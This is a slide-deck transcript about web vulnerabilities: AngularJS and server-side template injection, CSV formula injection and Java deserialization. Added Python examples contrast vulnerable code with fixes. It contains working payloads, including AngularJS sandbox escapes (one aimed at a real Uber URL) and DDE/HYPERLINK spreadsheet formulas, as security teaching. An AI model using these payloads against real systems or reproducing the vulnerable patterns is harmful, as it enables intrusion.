nguyen phuong truong anh - some new vulnerabilities in modern web application

Post on 15-Apr-2017


Some new vulnerabilities in modern web application

(Part 1)

hkln1 (@anh_npt)

Thanks to the sponsors

AngularJS Template Injection (Client-side template injection)

What is AngularJS?
• Popular MVC JavaScript framework
• Maintained and recommended by Google
• Read more: https://docs.angularjs.org/tutorial

What's the risk? (1)

Not vulnerable

What's the risk? (2)

???

Four general attack vectors
1. Attacking the Sandbox
2. Attacking the Sanitizer
3. Attacking the CSP Mode
4. Attacking the Codebase

The payloads…
• 1.0.1 - 1.1.5: {{constructor.constructor('alert(1)')()}}
• 1.2.0 - 1.2.1: {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
• …
• 1.4.0 - 1.4.9: {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
• 1.5.0-rc2: Fixed

AngularJS injection in the wild (1)
• https://hackerone.com/reports/125027

AngularJS injection in the wild (2)
• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}
• Response: wrtz49 → Vulnerable
• Exploit: https://developer.uber.com/docs/deep-linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz

Demo: Piwik

Server-side template injection

What is a template engine? (1)
• Presents dynamic data via web pages and emails.
• Separates presentation (HTML/CSS) from application logic.
• Used in wikis, blogs, marketing applications and CMSs.
• Some template engines: FreeMarker, Velocity, Smarty, Twig, Jade

What is a template engine? (2)
Plain PHP:
  <?php echo $param ?>
  <?php echo htmlspecialchars($var, ENT_QUOTES, 'UTF-8') ?>
Template engine syntax:
  {{ param }}
  {{ param | escape }} / {{ param | e }}

What's the risk?
• Not only XSS: Remote Code Execution (RCE)
• Arbitrary object creation
• Arbitrary file read/write
• Remote file include
• Information disclosure and privilege escalation

Introduction (1)
• $output = $twig->render("Dear {{ first_name }},", array("first_name" => $user->first_name)); → Not vulnerable (the template is a constant; the user's value is only data)
• $output = $twig->render($_GET['custom_email'], array("first_name" => $user->first_name)); → ??? (the template source itself comes from the request)

Introduction (2)
• custom_email={{7*7}} → 49
• custom_email={{self}} → Object of class __TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string
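The two render calls above, and the fix for the "custom email" feature, written out in Python/Jinja2 (the Flask/Jinja2 engine from the demo list). This is an added example, not code from the slides or from Twig/Jinja2 themselves; it assumes the jinja2 package is installed, and the template ids and texts in EMAIL_TEMPLATES are made up.

```python
"""Server-side template injection: the safe and the vulnerable render pattern,
plus the allowlist fix (constructed example; assumes the jinja2 package)."""
from jinja2 import Environment

# autoescape handles the XSS half only: an injected {{ expression }} is evaluated
# by the engine before any output escaping takes place.
env = Environment(autoescape=True)

# Safe pattern: the template source is a constant; the user's value is only data.
GREETING_TEMPLATE = "Dear {{ first_name }},"

# Safe way to offer "custom" emails: the user picks a template by id from a
# server-side allowlist instead of sending template source. (constructed ids)
EMAIL_TEMPLATES = {
    "welcome": "Dear {{ first_name }}, welcome aboard.",
    "reminder": "Dear {{ first_name }}, your invoice is due.",
}


def render_safe(first_name):
    """User input is a render variable; it is never parsed as template code."""
    return env.from_string(GREETING_TEMPLATE).render(first_name=first_name)


def render_unsafe(custom_email, first_name):
    """The vulnerable pattern from the slides: the template source comes from the
    request, so {{7*7}} (and anything else the engine can reach) is evaluated."""
    return env.from_string(custom_email).render(first_name=first_name)


def render_selected(template_id, first_name):
    """Fixed 'custom email' feature: the request only chooses a template id."""
    try:
        source = EMAIL_TEMPLATES[template_id]
    except KeyError:
        raise ValueError(f"unknown template id: {template_id!r}") from None
    return env.from_string(source).render(first_name=first_name)


if __name__ == "__main__":
    probe = "{{7*7}}"
    print(render_safe(probe))                                   # Dear {{7*7}},
    print(render_unsafe("Dear {{ first_name }}, " + probe, "user1"))  # Dear user1, 49
    print(render_selected("welcome", "user1"))                 # Dear user1, welcome aboard.
```

The probe comes back unevaluated from render_safe and evaluated from render_unsafe, which is exactly the 49 check the next slides use for detection; render_selected keeps the feature but removes the attacker's control over the template source.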

Template injection methodology

Detect (1)
• Plaintext context (input → response)
  smarty=Hello {user.name} → Hello user1
  freemarker=Hello ${username} → Hello user1
  any=<b>Hello</b> → <b>Hello</b>
  smarty=Hello ${7*7} → Hello 49
  freemarker=Hello ${7*7} → Hello 49

Detect (2)
• Code context (input → response)
  Personal_greeting=username → Hello user1
  Personal_greeting=username<tag> → Hello
  Personal_greeting=username }} <tag> → Hello user01 <tag>

Identify

Exploit
• 'For Template Authors' - sections covering basic syntax.
• 'Security Considerations' - chances are whoever developed the app you're testing didn't read this, and it may contain some useful hints.
• Lists of builtin methods, functions, filters, and variables.
• Lists of extensions/plugins - some may be enabled by default.

Payloads: Smarty (1)

Payloads: Smarty (2)

Payloads: Smarty (3)

Payloads: Smarty (4)

Payloads: Twig

Payloads: Twig (Sandboxed)

Payloads: Jade

Payloads: FreeMarker

Server-side template injection in the wild

• https://hackerone.com/reports/125980

Demo
• Flask/Jinja2
• Alfresco

Reference
• http://blog.portswigger.net/2015/08/server-side-template-injection.html
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
• https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii

Formula Injection (CSV Injection)

What is CSV Injection?
• Exploited via export functionality that lets users download a CSV (Excel) file.
• Exports often contain input from untrusted sources such as survey responses, transaction details, and user-supplied addresses, …
• The attacker can execute arbitrary commands on the user's machine if the web application does not properly validate the contents of the CSV file.

How to test? (cell content → value shown by the spreadsheet)
• =1 + 1 → 2
• -2 + 3 → 1
• +3 + 5 → 8

The payloads…
• =HYPERLINK(https://example.com?test=&A1&A2,"Error: please click for further information")
• =DDE("cmd";"/C calc"; "DdeLink_60_870516294")
• =cmd | ' /C calc ' !A0
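Neutralising exported cells so that none of the above is ever interpreted as a formula. This is an added example, not code from the slides or from any of the referenced projects; the trigger characters follow the OWASP guidance cited below, the sample rows are constructed, and the two formula-looking comments are the ones from the "How to test?" slide.

```python
"""CSV/formula injection: neutralise cells at export time and check the result
(constructed example; trigger list per OWASP, sample rows made up)."""
import csv
import io

# A cell that starts with one of these is treated as a formula by spreadsheets
# (= + - @) or can break out of the cell (tab, carriage return).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Prefix formula-looking text with an apostrophe so the spreadsheet keeps it
    as text. Typed numbers are left alone: -2 is data, the string "-2 + 3" is not."""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return value
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows, neutralize=True):
    """Write rows as CSV text; csv.writer takes care of quoting embedded commas
    and quotes, neutralize_cell takes care of the formula triggers."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) if neutralize else c for c in row])
    return buf.getvalue()


def _is_number(text):
    try:
        float(text)
        return True
    except ValueError:
        return False


def formula_cells(csv_text):
    """Post-export check: non-numeric cells that still begin with a trigger.
    Numeric cells such as -2 must be skipped here, which is exactly the ambiguity
    that makes neutralising at export time better than filtering afterwards."""
    reader = csv.reader(io.StringIO(csv_text))
    return [cell for row in reader for cell in row
            if cell.startswith(FORMULA_TRIGGERS) and not _is_number(cell)]


# Constructed export: user-supplied comments next to a typed numeric balance.
SAMPLE_ROWS = [
    ["name", "comment", "balance"],
    ["user1", "=1 + 1", -2],
    ["user2", "hello, world", 10],
    ["user3", "+3 + 5", 8],
]

if __name__ == "__main__":
    raw = export_rows(SAMPLE_ROWS, neutralize=False)
    print("cells a spreadsheet would evaluate:", formula_cells(raw))
    safe = export_rows(SAMPLE_ROWS)
    print(safe)
    print("after neutralising:", formula_cells(safe))
```

The apostrophe is the usual text marker, but some spreadsheet programs display it, so the export should neutralise only text columns and leave genuinely numeric columns (like balance above) untouched.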

CSV Injection in the wild

Demo: Magento Community

Reference
• https://www.owasp.org/index.php/CSV_Excel_Macro_Injection
• https://hackerone.com/reports/72785
• http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/

Java deserialization vulnerability

What is serialization ?

What is serialization ? (2)

More complex serialization… (1)

More complex serialization… (2)

Serialization in the context of Java web applications and application servers
• In HTTP requests – Parameters, ViewState, Cookies
• RMI – The extensively used Java RMI protocol
• RMI over HTTP – Many Java thick client web apps use this
• JMX
• Custom Protocols

What's the problem?
• What if we knew of an object that implemented a "readObject" method that did something dangerous?
• What if, instead of appending an exclamation point to a user-defined string?
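The "dangerous readObject" question, made concrete in Python's pickle, which has the same property as Java serialization: code reachable from the serialized object runs while the stream is being read, before the application sees the result. The defence shown is the look-ahead allowlist (decide on the class name before instantiating anything). This is an added example, not code from the slides or from any Java library; the Gadget class, its harmless side effect and the allowlist contents are constructed for illustration.

```python
"""Deserialization of untrusted data: a constructed gadget whose load hook runs
during unpickling, and a look-ahead allowlist that refuses it (added example;
Python analogue of the Java readObject problem)."""
import builtins
import io
import pickle

# Records what ran during deserialization so the effect is observable.
SIDE_EFFECTS = []


def record_side_effect(note):
    SIDE_EFFECTS.append(note)
    return note


class Gadget:
    """Stand-in for a gadget class: deserializing it calls record_side_effect().
    In a real gadget chain the callable reached this way is far more dangerous."""

    def __reduce__(self):
        return (record_side_effect, ("gadget ran during load",))


def build_untrusted_payload():
    """What an attacker-controlled cookie or parameter could carry."""
    return pickle.dumps(Gadget())


def build_trusted_payload():
    """The plain data the application actually expects."""
    return pickle.dumps({"user": "user1", "roles": ["viewer"]})


# The only names the loader may resolve; everything else is refused.
SAFE_BUILTINS = {"set", "frozenset", "range", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    """Look-ahead deserializer: find_class() runs before the class is used, so a
    disallowed reference fails before any constructor or gadget code executes."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"refusing to load {module}.{name}")


def load_plain(data):
    """Unsafe: pickle.loads() resolves and calls whatever the payload names."""
    return pickle.loads(data)


def load_restricted(data):
    """Safe: raises pickle.UnpicklingError for anything outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    print(load_restricted(build_trusted_payload()))
    try:
        load_restricted(build_untrusted_payload())
    except pickle.UnpicklingError as exc:
        print("blocked:", exc)
    print("side effects so far:", SIDE_EFFECTS)        # still empty
    load_plain(build_untrusted_payload())
    print("side effects after plain load:", SIDE_EFFECTS)
```

The trusted payload contains only dicts, lists and strings, so it never triggers find_class and loads normally; the gadget is refused by name before it is built. The Java equivalent is an ObjectInputStream that checks the class name in resolveClass against an allowlist before delegating to the default implementation.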

How to identify whether an application might be vulnerable?

Java deserialization vulnerability in the wild• http://artsploit.blogspot.com/2016/01/paypal-rce.html

Analysis of exploiting the real cases – JBoss application (1)
1. Identify

Analysis of exploiting the real cases – JBoss application (2)
1. Exploit

Demo

Analysis of exploiting the real cases – Jenkins application (1)
1. Vulnerability Detection

Analysis of exploiting the real cases – Jenkins application (2)
1. Vulnerability Detection

Analysis of exploiting the real cases – Jenkins application (3)
1. Vulnerability Detection

Analysis of exploiting the real cases – Jenkins application (3)
2. Exploit Development


Analysis of exploiting the real cases – Jenkins application (4)
2. Exploit Development

Analysis of exploiting the real cases – Jenkins application (5)
2. Exploit Development

Demo
